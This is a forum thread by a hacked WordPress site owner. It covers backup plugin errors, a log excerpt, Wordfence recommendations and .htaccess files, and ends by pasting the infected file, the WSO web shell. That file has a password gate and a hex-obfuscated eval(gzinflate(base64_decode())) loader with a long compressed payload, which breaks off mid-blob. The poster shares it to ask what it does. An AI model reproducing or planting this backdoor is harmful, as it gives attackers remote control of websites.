syzygist

I uploaded the missing file, and Updraft Plus seems to be working normally now. However, after downloading my backup files to my computer and deleting them from the server, the deletion confirmation in UpdraftPlus also said there was no local copy present. I checked, and the local copy was indeed present. That seemed odd.

I can’t decipher the log – I know nothing about php. Is the missing file the only problem? And I’m still wondering about that double slash in the path.

No, it turns out it’s a WordPress core file, so it wasn’t backed up. I can, of course, extract it from a WordPress install, but I’m guessing Wordfence wouldn’t have let me remove a WordPress core file without additional cautions, and I’m also realizing that the full filename may not be the same as the one of the file I deleted, so I’m going to wait and see what the plugin authors say about my logs before I do that.

I’m curious, though, why Wordfence wouldn’t log file deletions for just such situations as these? It is in every way such a well-thought-out plugin, and that seems like such an obvious and useful feature. Would it be hard to do?

Thanks for the response. I already tried reinstalling the backup plugin, but the missing file was not recreated. I installed another backup plugin which is working fine, and have sent the log file to the cr4ators of the first plugin so they can look into it.

I notice it’s possible to email a more detailed Wordfence scan log to someone. Could I email that to myself, and would it have the names of files that were identified as infected?

Actually, the contents aren’t that long, as I installed UpdraftPlus recently. Pasted below. Three notes:
1). I have replaced all identifying info with generics as I was recently hacked.
2). The name of the missing file (class-pclzip.php) sounds familiar to me. It’s possible I deleted it when Wordfence identified it as fatally infected. Unfortunately, there is no log of deleted files (I checked with Wordfence about that).
3). I’m still wondering about the path to that missing file. Why is there a double slash between mydomain.com and wp-admin?

Thanks for taking a look at this:

0000.000 (0) Opened log file at time: Mon, 12 Oct 2015 22:01:46 +0000 on https://mydomain.com
0000.005 (0) UpdraftPlus WordPress backup plugin (https://updraftplus.com): 1.11.12 WP: 4.3.1 PHP: 5.4.45 (Linux server.myhost.com 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 22:55:16 UTC 2015 x86_64) MySQL: 5.5.45 Server: Apache safe_mode: 0 max_execution_time: 900 memory_limit: 256M (used: 25.8M | 26.3M) multisite: N mcrypt: Y LANG: ZipArchive::addFile: Y
0000.361 (0) Free space on disk containing Updraft’s temporary directory: 358287.3 Mb
0000.364 (0) Tasks: Backup files: 1 (schedule: manual) Backup DB: 1 (schedule: manual)
0000.367 (0) Requesting semaphore lock (fd)
0000.369 (0) Semaphore (fd) was stuck, set lock time to 2015-10-12 22:01:46
0000.370 (0) Semaphore (fd) reset to 1
0000.371 (0) Set semaphore last lock (fd) time to 2015-10-12 22:01:46
0000.372 (0) Semaphore lock (fd) complete
0000.377 (0) Backup run: resumption=0, nonce=fa5e84f448b8, begun at=1444687306 (0s ago), job type=backup
0000.379 (0) Scheduling a resumption (1) after 300 seconds (1444687606) in case this run gets aborted
0000.391 (0) Checking if we have a zip executable available
0000.392 (0) Testing: /usr/bin/zip
0000.402 (0) Output: zip warning: binziptest/test.zip not found or empty
0000.404 (0) Output: adding: binziptest/subdir1/ (in=0) (out=0) (stored 0%)
0000.405 (0) Output: adding: binziptest/subdir1/subdir2/ (in=0) (out=0) (stored 0%)
0000.406 (0) Output: adding: binziptest/subdir1/subdir2/test2.html (in=135) (out=111) (deflated 18%)
0000.407 (0) Output: adding: binziptest/subdir1/subdir2/test.html (in=128) (out=105) (deflated 18%)
0000.408 (0) Output: total bytes=263, compressed=216 -> 18% savings
0000.417 (0) Output: updating: binziptest/subdir1/subdir2/test2.html (in=135) (out=111) (deflated 18%)
0000.420 (0) Output: total bytes=263, compressed=216 -> 18% savings
0000.421 (0) PHP event: code E_WARNING: require_once(/home/username/public_html/mydomain.com//wp-admin/includes/class-pclzip.php): failed to open stream: No such file or directory (line 1023, wp-content/plugins/updraftplus/class-updraftplus.php)
0404.504 (1) Opened log file at time: Mon, 12 Oct 2015 22:08:31 +0000 on https://mydomain.com
0404.505 (1) UpdraftPlus WordPress backup plugin (https://updraftplus.com): 1.11.12 WP: 4.3.1 PHP: 5.4.45 (Linux server.myhost.com 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 22:55:16 UTC 2015 x86_64) MySQL: 5.5.45 Server: Apache safe_mode: 0 max_execution_time: 900 memory_limit: 256M (used: 20.8M | 22.3M) multisite: N mcrypt: Y LANG: ZipArchive::addFile: Y
0404.773 (1) Free space on disk containing Updraft’s temporary directory: 358178.7 Mb
0404.777 (1) Backup run: resumption=1, nonce=fa5e84f448b8, begun at=1444687306 (405s ago), job type=backup
0404.779 (1) Scheduling a resumption (2) after 300 seconds (1444688011) in case this run gets aborted
0404.795 (1) Checking if we have a zip executable available
0404.797 (1) Testing: /usr/bin/zip
0404.829 (1) Output: zip warning: binziptest/test.zip not found or empty
0404.831 (1) Output: adding: binziptest/subdir1/ (in=0) (out=0) (stored 0%)
0404.833 (1) Output: adding: binziptest/subdir1/subdir2/ (in=0) (out=0) (stored 0%)
0404.834 (1) Output: adding: binziptest/subdir1/subdir2/test2.html (in=135) (out=111) (deflated 18%)
0404.835 (1) Output: adding: binziptest/subdir1/subdir2/test.html (in=128) (out=105) (deflated 18%)
0404.836 (1) Output: total bytes=263, compressed=216 -> 18% savings
0404.845 (1) Output: updating: binziptest/subdir1/subdir2/test2.html (in=135) (out=111) (deflated 18%)
0404.847 (1) Output: total bytes=263, compressed=216 -> 18% savings
0404.848 (1) PHP event: code E_WARNING: require_once(/home/username/public_html/mydomain.com//wp-admin/includes/class-pclzip.php): failed to open stream: No such file or directory (line 1023, wp-content/plugins/updraftplus/class-updraftplus.php)

For others who encounter this problem, I highly recommend the plugin WordFence. As Red Deer Web Design mentioned, it can check WordPress core, plugin and theme files against a repository of the latest released version, and find hacker files masquerading as something else. It was so sensitive, it found files that differed from the original by only one character. It also identified files that were not part of a normal installation. WordFence scans turned up several infected files that I never would’ve found on my own.

It can also block new accounts with the username “admin” from being created, which was very helpful in my situation, and you can set your firewall to automatically block IPs that engage in questionable behavior (such as repeatedly trying to log in, or access non-existent files). All of the options are explained right on the spot where you choose the setting, in beginner-friendly language with recommended settings.

WordFence also now notifies me immediately when someone logs in to my dashboard or makes any changes to my installation.

Last, but not least, WordFence lets you watch what site visitors are doing in real time. This is very useful if you know a hacker is currently attacking you, as you can block their ip address. It’s also interesting even if you aren’t being hacked!

It runs automatic scans, and you can also scan manually. It also has a fast cache that was more user-friendly and a lot less complicated than other plugins I have tried that were strictly for caching.

All of the above is in the free version, and was extremely helpful to me. So far, I seem to have been successful at locking the hacker out without having to reinstall all of my sites. I installed WordFence on all three of my domains, but I don’t know whether I needed to, as the top-level installation catches things in the add-on and subdomains.

I am not in any way affiliated with the developers of WordFence, in case you were wondering. Check them out, you’ll see that a lot of their users talk about them in glowing terms. I only wish I had found them sooner, ideally *before* I was hacked – maybe I never would have been!

Thanks for the sympathetic responses. It’s very stressful – I really wish I could afford to have someone else fix it for me, believe me! And then my AV program started identifying this page as a threat because of the text I posted and blocking access! I did finally figure out the way around that.

Today I ran two different malware scanners on my computer, as Jackie suggested. They found what appeared to be a trojan and a related pup in an appdata temp file of a user account on my computer that I rarely log in to. I removed them both (along with about 3 gb of tracking cookies!). They were dated last year, for what that’s worth, so I don’t know whether they were related to the current problem or not.

Then I installed and ran the Exploit Scanner plugin from my top level WP installation. It identified hundreds of possible threats, 134 of them in the “severe” category. While some of these are doubtless false positives (I did have it include display:none and visibility: hidden), it did drive home the point Jackie has been trying to make about how difficult it would be to track down everything the hackers installed.

To whittle away at the dubious file list a little, I deleted all plugins and all but the active theme from the add-on subdomain, many of which were not current, as I use that domain primarily for testing. I am fine with just doing a reinstallation of WordPress in that directory, as there is no content I need to keep.

However, I’m wondering if I should do that last. In fact, I’m wondering in general what order I should be doing things in to minimize the chance of reinfection.

A checklist in the order that the different things should be done would be very helpful. For example, if I am going to reinstall all my plugin, theme and WordPress files, do I even need to change the passwords in my wp-config file again?

Can anyone refer me to a beginner-friendly step-by-step for how to save all my content and reinstall?

Can anyone translate for me what the php code in the hacked file does? My newly-created admin user was once again hijacked, with the username changed to admin, and the password changed. I was able to get back in to my site, but I don’t know that there’s much point to creating new users if they’re just going to get hijacked again.

I would also like to understand how the hackers were able to upload files to my WordPress installation. Does this mean they have FTP access? If that is the case, don’t I need to be worried about files above my public_html directory?

While I appreciate the responses thus far, I don’t think the respondents quite understand how complex and overwhelming all this is for someone who isn’t regularly mucking about in the WordPress backend, and moving/restoring sites. It’s not just a case of doing something I already know how to do and have done many times before. I have to learn how to do it first. When I talk about it taking days, I am not exaggerating.

And I don’t have days. Please understand that I mean this literally, I am not just expressing an unwillingness to use my time that way. I have limited time to spend on this, which does not in any way express that it is unimportant to me, but is just the reality of my life, which is already a juggling act, without the added stress of trying to figure this all out.

The top level site is large and complex, with a number of plugins that connect with external accounts, such as polls and social media. It has hundreds of posts and images. The subdomain is my business site. Both of these sites represent countless hours of effort and study on my part, and are very important to me.

I would really appreciate some help here.

Here are my htaccess files. The files for the add-on domain and its subdomain are the same. The first line in both of them had to be noted out recently, as it was causing several of my dashboard panels not to appear. My webhost edited the htacess file for the add-on domain a few days back (before I discovered the hack). Not sure why they noted the problematic line out rather than removing it, but I figured (with reservations) they knew what they were doing. I noted out the same first line in the subdomain file myself yesterday when the dashboard displayed the same problem.

#AddHandler application/x-httpd-php52 .php .php5 .php4 .php3

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

Here is the htacess file for the top level domain (in which the infected file was found). I have both the .com and the .net registered. I use the .net, and the .com is parked, and redirects to the .net:

RewriteEngine on
RewriteCond %{HTTP_HOST} ^mydomain\.com$ [OR]
RewriteCond %{HTTP_HOST} ^www\.mydomain\.com$
RewriteRule ^/?$ "http\:\/\/mydomain\.net" [R=301,L]

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

Here is the text of the infected file with the php tags removed from the beginning and end (since I don’t know much about php, I’m playing it safe):

##   ##   ###              # ####        ####  #####
	    #  #  # #  # # # # ##     ###   #       ####        #
	   #####  #  # # # # ##      #  #  #           #      #
	   #   #  #   #  # # #       #### #####     ####     #######

$auth_pass = "ee48d18bd2257225fd94ffe54d0d5480";
function wsoLogin() {
	die("<pre align=center>	<img alt='Proble Officer' src='data:image/gif;base64,R0lGODlhIwAdAOZ/ANra2kVFRaqqqsDAwM7Ozu3t7WVlZSIiIrOzs+rq6qioqGhoaK6urqysrL6+vra2tqOjo7S0tEFBQYyMjMbGxnx8fIiIiElJSRwcHD4+PpycnAkJCcLCwtfX13p6emxsbJOTk6ampnR0dMnJyRQUFGBgYDY2No6OjpiYmHZ2dlxcXCoqKpqampaWlmJiYoqKik5OTl5eXmpqaoGBgYaGhnFxcVFRUaCgoIODg3BwcFlZWW5ublNTU1ZWVjExMS0tLVhYWKSkpExMTFRUVDk5Od3d3enp6fb29svLy/z8/PPz87Gxsbq6utHR0c3Nzff397m5ufHx8e/v7+Hh4X9/f/n5+dXV1cXFxbi4uObm5oWFhZWVldjY2JSUlJ+fn/7+/tnZ2ejo6Lu7u8zMzPr6+rCwsN/f3+Li4p6enuPj4/39/dzc3PLy8pGRkfDw8ODg4NDQ0NLS0tTU1N7e3sTExPT09Pv7+9PT0+Xl5efn5/X19e7u7vj4+AAAAP///////yH5BAEAAH8ALAAAAAAjAB0AAAf/gH+Cg2ojFlQqEjAXPxgYBysuhykeTVMFSYOam38IKmIjc08EUnhwcHJ1SzMhCBMlOhMsCEecmmUfSX5+RQ5iW0hiS1hIDA9NAFMjSwwQEzZNtn9rH2p2RkwDIQIEA1gPLEdqfklSbwBFVgV+WT1ltl1MflZXWAxIabq7UFK7fk5ImsQZUMbILhi1NBUp8cTPkW5OlCRY4oVOlDpg/I1R4s/KlF0pzGgyM2GJP3JlMvTpcyDGBQZf/OkBgAABgzj+GLRRIwhAjB7+wqBgsoHESgwoxMBA4YdPEQEHVvZZMcCMkjUitpCJUsJCHgEeaAQRAAeCkyU06MwIQASNww8b/35QQcGlAxsjU948cDGARQUlWl5OWHCByo0uNiDsWuPkpIsifr7g8cMghwwLTNDUCODGCQw+CUwUSYNCi5bGJ0/aYLHLRYYfGqC0aHKiR48nCHaMkRDAxgcu/sgkeLAjAAF/BEosMFJghJEJVqpAQbAgABwKRBR8KOFHgAQbXq7IIYOlhIIFODj68dKHhig/GCoYgTIEgpcFUFAUUHLgQx0HF4iwgAoTlCFCBBGgkQUWJ8AQRxgd4JFDHyUgMYYNRzxRwQlIkOGHAhsEAIMPYESRBg4rmFCBAFKM4MEHdyTQhAAZBJCiERAsIUgRJjDgjwonWLDBBioQQIENSixRwf8BEqiwgAs68HAAFyqo8EMWE6QxSAcL5LGLGRI88MEMPmyAgQlMHOGHARlp4YEeT/CAxgoY+HDGFnhowgAI/jBBwgK7DBAABiQUVdQBJJCA6AZSmXAGCG9oUkAJAPgjhgRu+bEAB1dU4EOhUoVKaA9sdHHGJnIIAVlMC6kAQQlV7HJDBSNgYcIHOGSQAgw2vuDHBKduMocICDghxhxpbJGBEAp0UIUFfGq6hwYLUPGBDhm44YcFWnISwgFbXDGAAFmEAYUBOtTQgwRaGHCACCaUAEMGJxj0BQhccBJFD1wskIEGVigwABJ3SCFHFg9MgMJhUBRhRh15vLEHGQK0wUnSgLtwwAMMGlzxAAUMCNBEAnqwYccuVdgxxgBKiCEFEhVwAkQPMlixywhd1KABGGeA8YAFGoDQAANMPCAABWtcQYcfA8SsCQFEpHDAAS6k0EYcRjSggwYNSVHFEQVMEUYYRmQxxR7kiEDBIAnMoAMJd/ARRQ0GjFACB38UIIABC8zwwB1RpLZLARVY/EcVAmRpBxFeCOIGBDsMsEMBghwxBQcKgFDDBy1wMAAdAlBRAQdfCILCFpmwoUINbgwCgA0wjMFJElEwoYUIHqQgAgDrDBIIADs=' />
<form method=post>Password : <input type=password name=pass><input type=submit value='>>'></form></pre>");
}

function WSOsetcookie($k, $v) {
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}

if(!empty($auth_pass)) {
    if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
        WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
        wsoLogin();
}

preg_replace("\x2F\x2E\x2A\x2F\x65","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X37d9s4zujP3XP2f2A12ZHdOn6l6Xbi2H3k0abTJp0kfSa5XtmWbU1kySPJcdJu/vcLgA+Rkuy4ndn97j3nS2cSSQRBkARJEARAtz8OmbXte8Eli1y/bcfjMEr6s4R5/TCw2Thyh217nCTTrVptPp9XB1/X4yRynYkXjKrurDZ0rhCyCr/szt//xuC/7Ti58V2W3Ezdtp2410mtH8eU6AXTWXJGCfGsN/GSi4r+rTdLkjAwv0Vu7CYX3/7+t3uIad3xvVGw1XeDxI1a8LHn9C9HUTgLBluzyC8JQr1HG9XEC26mXr/aDye1zXA+mvxR/X06KkMtp66TrF8zjoT1Qih0wn56TD+EM4wGbrTVmF6zOPS9Afvp0S7+w7R+6IfR1k879JMCryfhdF2kbT7Gf5g2dQYDaKatR4Dp8fQaP02caOQF9GWTfxm73micbDUEwPok/LreC6/X47EzCOdbdVZnSEnPh5oSwNztXXrJUphladSMKtFEzcumCkXOwJvFSKhZaFHi5TiZ+MVphR9FlZsb9Hr797/9/W95ztgah1fQPUUMwpMK2IQnfDP4Yn0axl7ihZJrGHSVaoeB2w8jh1KDMHA5NRpaBDL5cerE8RwqdfEtx33/bzHff5yR/svc0niij6B13x0mW2IMyT4DZsEOc2B6gkfOLPgQDm7gT9+ZYkcjkNOD+aki4EL+GfqTwU84S2AydCU74KckcgLBQszxfVavNusxc53YXQdCIIOAk9UugN8shMcGXBXYbBo+cvRCF6bneylNzDFbNOo5pXoF/yElZYSrPQDIYRgk60OY9f2bLWa/9IDSEyDcrmgv7O0pvO/AFN2LPEg4jdzerD92E/b2BBJiAFmP3cgbttiDWnGviU7QxhXDad1WQ6thDC2vdzkZbFanwciWY4vF/SjEdoR/P23QT8uWs4wocWsY9mdxWix/ZxXOMVtOP/GuXME4Mk2yj3onJpJvOpZQh1M1SgcSkQaMKxubwX/Nzc0Ka5Rzffo9mTLjfXkOo/+ZNtvg1FKvpxB/fU/QKINpeugjlc4sCeEjMdl/iMv+/jfsyG9YyD2tBLbFPrjRwAkcDsmnV/j60/CX4eNhAycbAo+9ry58rlf/6U4yMgczhI5HZpNsPk76v/B5PwjXRaOkixD7qbmJ/1pLh8L/zkeZ+eh2+SCmZpONxuqEWBTHl0iO80kTBsLjJzAkNh4j6id8GBWNPC8A0UIsfhvmeCKqGuUK8fgTmZbF/Vjgzg7QvwrxX4/zvz361fTM2HaNdg+4W2AWJK11T/ZOTg6ODs/w6fjD3vGZ/er09F331dHJqX1xwdowHmY4NNb4+G0z66fBcNNq3avVduDLLIKkgTt0Zn7Sxakd1nqA2fd8N37rBFSGTO6PnQjbD9I/egE0aLzeaG42EMYblth9dzJNbkoZQt7DW/f5y71DIKfMynLgrs1gFno+guEeAz4nipybkvUyDEe+a1WYdeLPoik+vD05fBEm+OQ5XSfqj2HtifD1sxMM3Gt8OnYmsNZElpzqhyHwe39c0otwYrbm4GOZw+AP0gybNRCAl9FckRnZ/XabDR0/dtNayJ+x68AQKlHuWqNaZ4/qj9hhmLB95A5bUiZ/3Gsv0T7dUgc/i904hubvxjBgkxLmeeZGURh1gWVg1wlbpVKdvnqB14V+KNk82Q9HduXw/Zs3ZiJ87hIALBCZfBPnuuteu7CPxfISb+JKEEim967vwS6jlH6cOCOv3/1jFiZu3I1mAQKJZGAPmE1KNrQfciIuRxvVOlUam3iUzT2a9kuCE+4NZwHnuY8nR9AX3jT2nXjsQo8QS3Cge5GbzKKAeXGXM4pMfMoZB9BPS3YGg40dx8G2WBFqXKug2e+tdd/BWAEmzJFACWW1B+PsksCgmUNfM9iIwWvp3at33aMTmIE3sE7AItbcCyxWRswh8rYN7zi0XeCc9GPgXePHtdgZut1JOHDhI3XQCDtIfaVWXBt4MYpTXdlasQGcS+WZxiF0Y38+QFiAg6eS7BIvRjZgvIJndt++ANKR4mf98cCLSloCoSrGQjUR9eMdpZcJbYOMC9sht2Sdn+NArcEvBULtv7YcVoDdivLg9QxAfTcoUdJ64wIGJbNrNm9uRFal95boMINEBAG5CNbqdMpB7rLeeHHCdr3I7SdhdGOxdodZ0AxWhQ/RezAbBgNYO2C+qU7HU3hi/VkUwaTAEEzCs1rManNW66WgGRQP+mEw9EYPVsOiQ6eITsbhnAkZHAACl/c5zx+4CcweCVuHmdvMAUM2gBmEwZR45fXdFJ7RdJNCvwcIwN+HiSvRoHAuzaCEpQ0EDTfSoK48d45Q0KjPj9+xU+RLnupEU6BKpB28YztUtxnXLnAQb8orzGogWVkAWNZGTb7jgA7Rdar5/Jit+2NZio9pQ1jImJPAuIbtC+SHqcZhb7xgBjKUC+UNYDJOXOivAQeNb+LEnUh0mJGtXzm85oAzxoqHUzcAeJyU8+3O/s1GwMts3WNIgBsIapABOLBCNkSeQCkynnm8eIGOEmpsHVUqbMjWp240Yev1R/V6HSoYmwjSzIUsRTDVFXERMaOViGkWEzP6EWKKcXFuqHpBn8bLEpICZ+JmwItQPbgTx7klIM+tJQhWqtpyfNjQ88jjqpZh6IP0AEJKUNjwvJGaxb21GMlSKpfiFHNEdTof3NliGmyGE7JIVm+1hTiRuOo4ISXj3aQpSBNJBsHqZC3AR0T1QGTojmG8wwJyN2E6dIa4PKLvIHAxXiJyCOv3eOJ4ftS/m0YNOENiDs13UJjBijN42HcSNzMz+vSR4X5qUMUhpNObS5TzPf9+NQ7jJF6US0s1s02jcLikND05kzG+6QX9hfnSVDPb5GZRFpFigjuDiReY82AuyczRH46y86aZkgGHIhfBi6R8BphvB06yIAtPLMy0uBxvtLAkmNkXZ4LERZkIYXGWxbXiW97lhGpARUjkalGQ1QTXGSHtVps+2xnQzJysYOF7FjT+wy8Ehe9Z0KI5VcHLxGymRXOeyqgDZDNPboCMpbkNiGz2BVOZyqylZ7Ki0mZW1Kk8wQQezCZFoPg5O3t4V4WzhnclJdm//01tdudx+IprDPi+CXYqUnciNl5c0wLbL9y13Mt9BjF47eWboxfP35yc2Rn1jH2BO6uRH/Ycn3GtD35w+VE2ni51tlFf0dmeuIlD0+i6+8fMu2rbIJSDwJqsn8KcbSOr4ps4pMaMLSbKaFswteepqjLL7mwnXuK7HQ5RoJNCqHXcbLOzF3hYtn6we8EQWugPWNXarnEcf//btlR3kY5aO7YUB3qPHj1qiUe3gf9atxy2kgwqyfgb6cy32C/ThL2Z9b2BU5FKbXHUXG9duVHi9R1fHJ7j+aeJEfUzJGPBjDEMvzGROhwOW3mCms0mZYinTlAZNyqOhBddwe57E9w4OEGi4DiV63N+ksd6JMlR6rjxTapn6URvU6l+RcfKM3TWFEfmvL6NR1BhWdNiImX9IQ+WNPCuqqLDvzGFFTHqJ4r4nkeHykvEAXUtPDamNHH4nIMAPG6E6mgCq058VWXjlBf6WVKVEgW9l1GWEo6eN0KV9zc29wbJeKtRr/+jJQ/VN2WFSUtekerxSuz6sJP+xhTipb28ubnZyhEpukRjubdhEEIH990KDK1Z5MHO+tCd21T+MIwmaXGCqJ+SMPTj054v2smw56C6EcBBMJWVYxt1yMybzgE5DHhey4mdVkS+i/9aaaZI9M4iUISEjikcf5A2jdxv+uGUqGxF1R+LSlXX23E/8qZJh2sTrpyI9buoE8NJAKeZeOr2PceneaWUznN9WIIuyjTJtNKszuKsz+QM5VA+y9YK5HPWCnnTqRgxaAVPGyp3qST0yCrXtGFfVKzzwCrfb7dJaVx+attbwMFSu5ivqJa1XM6V1lxWWvO7SzPyFhS3say4jT9R3IZeXKr/RYWkU+lXpo3KtFmZblREuwsNMKyQDur6gpnvlwdhfzaBMVGdDKtO9crxZ27baaGmiBUmdVsCRb8QRV/A9fMoVJJCMW0U4pg2BOS0kceiJaZ4msV4mhK0WYAnTUzxbBTj2ZCgGwV40sS0acTZTmED8TTZFvytoLGKwLpSza56erSsnxeyAdGpl8btoErlHH7nx/ET5zuRMyEVvfO7c93G0zPi1HswYZe8dr3lbetkwLKBj3HVd4NRMm55Dx+SyHZP4HkIiH62HxZlOfMuqrgrfmi37Ydu0A8H7vvjg50Q5IMA0kuL8lD7coLjqERjVBt6qcx1vPfb+72T0y4gFbNXRdQu32iAaBb5Kl0OOlaa00Ff9dPbN69AUDwGQdGNE17DyP0Dmilw58xM5X1yj/hDQ/GcdNafjnq/w0KbxWAkluy3Xj8KY9hxU8EgOxpHaIgUsuZO4eBbNQxgNR/coDYWJF4nGOHBCmze+24cA3079KlVkG/qBiUb5yhoJWoK7PlyASRwi6gol+FZyZSbK8A506kPIiW2bO16fT6fr+Nqvz7Dowvs5vyJIEccDEppB2mng2ZfZWtTSudIapcqtcAJtgAefjziRzuUTsVAwoyORZr1usjKWT9yR6I7jt3R3vW0dG6VzuFn8LBcOsOHE/wVXzwo4xGNPbF5R/PMThS1AUEVzxUFFTEwcuyegjgiAV3g3RJAnjUvquL8rF7BrGcNWBU40C0jznF8kMtLtmhqRieZ923JuSBMSBlCbGZQ6O9sgxjLSMxo28qw0emBfDZL3JYmDhbvJED2B8mPJN16C01yt7HfGOyTxuGgDQgThgO2PRnKQgZePPWdGy7nUg5uqULGkGNvMHADnsVZktZfkjZtLEtsLkvcWFYkn/YQooZ17Fh0HDeMXPcEBTY87oO6XeIHkuBychjBJ2Hi+EaGLn3qrppHe3uqPW+RedFaBNOeExPu6XjanSHpJTviXLB26UaB62cSY5HoXg96ZLYN869mn+1eT/3Qgw1IjywzYhdNCmpPueFDm7/+DPt4kLe7U2fkthvybeByjkM4WhA08wGbDpTwxJnTZNgK0AZekVNtMzUNlBjPyH7lNbFhJhejQla9Uq88hvFLG3h+ErYQl2yPKuApxrQhMAHl9+Vs0nWvvTiBKuBwucYDZXfkwfwkJgayoRBnv12h4+3iNzHJr+HhE0+e3MCz/DzSPo+0zzDkpmg/8pT4TQz1bzomRcd0jvjSd5fQm/hV4igamcAjDVjUAUs4s5FNuIpEFsm/wy/5WVKJpZgZeLH8+0hmuBVnz13sFJIciD/Wpk4yhjdiOeggfqRdNCKCNp22lihHmRvWQcehsLHmba8F6w34C3KFaKi0KGAAa9sRXgg/2SwM+rDuXLbtEUzd0oQH5upzy1IizNrviPb37faaB3+ktGIiJULO1n6/qPKz9Fyh51bZ7lhVAQcyiVXbrjl8EuHNweeX9LzWfn+6v/4EF0fddAjffz06eLJ+rJ7e41N/+uTxYzGSw6lSbaWNq2x8VApa+HiJO+HjzciENgHbwo6ZC6eWXSXgKkhPdjWvdmu3KfmpzdUCsGBv2Xa5andUvu0aR9jhfT1JK3ri9qvsIBiGdruDL/RYsak78JPsFxuVAgEsTS5+lY8V+60TExz9rdi7IW7R6Qt/hG8nf/iEHP7AizN0GdmK4Cd4eYvP8D2J8MCfFAaURO+n9FqxD91kHkaXmCAfeXNPzoBofwjCwCS8cknVSB+O+TuHcYNZvism1AeXqP9cu+LdQIDU/DAUaPnFpi95QVIuwTpcE3w/KUPb/sPqnElmtn6yFDNbwMw2tPtV1T63K7g5qZzjk/pVtrBbLrFPnM7Fdi0Zi04ZRCBTIs9w9kexMR1/YYx1M8xXVFVYRHKV3YeG+gqJWC9CxmdzROTFXbKUoc9Ve+sc6BBDSRRL1V5UHzU4sQpAvURTo+qcsfQTu8BqMVsOLdLjQnvSoW8fhP64jWpJ1nd9X2jI2hv0hmswvtVFy6Pg09lOIvh/ID91tlEB2XmPk9zWdi/qoPkHPbwbT+nvq8GA/u7MB1s4VIob8KmNMLtU8y0xWEBGQ9zQIQPoIGwbpBtEtSAEWFsKgNrqXSYzzEazDrkZU42nrd8jshDU1u6nf7TtaroK6sjKOLoTJxqhvrrb853gEpqW2xjyRlUlQHPLVVXLxPN0zvaE0LD7grJt16gC21QJXDyA2BL2GK4z8FxmvFFf4jKyJVoB00cpKC0xCMuxINlXboTmfyWsO0egRraGROuA1EjsApof9W9c1Qxi+KBzdIiCXZB0oDP0tJ/q9V6vXgfqO0f7+9u1XkfCUbmiQX4yuRV4ITP0kOUEqwLpxICiSYnQXdh7oIWgRvgAPpXsz+uT9QF7teVtxcQiVPt5HH7w3PmJ9xVExlQITBtiH6RQDZUBr0RWBC/JySX9XNMwPoAhgDONaPV0UYOshPadG01iNIuNcrLr4tbJjmWVUZq62RdVY8KSs9YZQwjecIIiPnfg2DEHjRyvjPS67QiV2WIgbfM1Cmmi7SASRV1V9CsZe7FQIFgdXBO5rOM7PddvW+9A4pWqUZpU9WVUrHmUAZiGl0p0C251I/RIO3gne0qwtlJIWPxv9/nu7rF1wTufZ93xPbQdyGbVVRlvj073KKctcxbMDj30ujTmBm+6hbLwIiJQWM4Nd/YC103Ozv8unIW+wm5vfVwNo1FNmCTXvGn7+wv6gnhepQwgZxbsfPhFTzjPa5xA0z7ffFqpf9tWMz0qwdMY63uWA2hoXKeJ6dIita20JU4pNq2O8hXSzzL3wzBRZ5lrsDIqo6Q2095yQ+qppc9MIxixATTKRwB3KfeFmJqsLSs7vZ2RdbUqR0EKvQk/7MTNLdQCN7m55dIbtOVZy4ptxeSef3GzixTutphNRO3APWxv7EpaB0m5AHIfaTJRaE+HaF9q+YTpM+0lAYUYL1yxBQKIPmDEXp9X0pYHRTZTrppi6y9k4FWPW/BIV9MicGoljk7H7ggNAnHtgrqdw5zE50khf6Y1HRbW9NwSVT12HW6V8AM1HX4f4Zz9F3dQWgmS3qkK9uQSesHmVRksr8pb5/JH+2ywWk30sffnugMrhq1uL63Mf7ZfimqzUh+pvdRd40nVZo+cIdw/M5p+fJQI9SJqYBKb7R3unH5+t9e2JzM/8aZOlFDGdZCfHJvnXKRilMVxHn0eLAc35oHMsKdRvyzztCFzz0A2dgZY5B3FiQMmrdAS90PIn7Q+zX3CHQU3L6Ey+KaFSv4+JiQb77+GCeU6SUsMCNKkfyYzGVqGhM8IiPs5XZtl6risMvv5ZyZPWTW7npxfx0WF2WZeu9yWR7DoUcPSQwJTjbY2xVSD+dktmUHcQSEp1n6QQsp7N4Vcd7eQQl3S2LsurXmBEDTCWaKUEN6wlNNo4kmEUmQ+o3MJyFzBfEIxyDE8+z30ghKeZ6dpt6iYLEKKpnDJOJopxGFPc9iCciQAEaoXA4CkRPVdJygtL4Q7ISwsgif/qQLGIOR0jQYSSNIUhV9igZEQuXE4i1CzP+TqVzw1w0a1IqucwSR0jvMxDLnS/WdDNxxCNqkkQZhqmw3xrAo+Vxr15iNem2nfD2MsQZ1SCqZY4+61GZZId4KxMqZbi1mnzRr1f27881HjCSDWnMjiaQQ7xGHJ/kej2hyizj5mNQ2WlVGB/vKFLXXuGr5HTzb/+XgVZATIyqSLf1uIajWikBxC8muKRMsGUJj4olAqp70sH1ZC+QUv7GdWv96p48Ffuy0f1zwcR7FGZgr7PIV9nsL6hbBPUtgnKex6IezjFPZxCtsrhH2Uwj5KYQeFsM0UtpnC9gthGylsI4WdKljGP8y4NtFDflV566hKYE+ZHdlsCytZLgKqP+FA86VAjwgo/fBEoI4p1zVqlLYKkk8k0mKszVXoa6xCX/2JSd+j5fQ9Wo2++qMV6Ks3V6GvYdLXFAQkxfTJ5FODPjmkvPwUo2uFhulwuv+MZkRnwDe3YmoTeEyl2/4+UFnvpDqm0jOURKZ8iA7LpC3lajidUamEdPu8pASYZRP3u/AvpLVef/F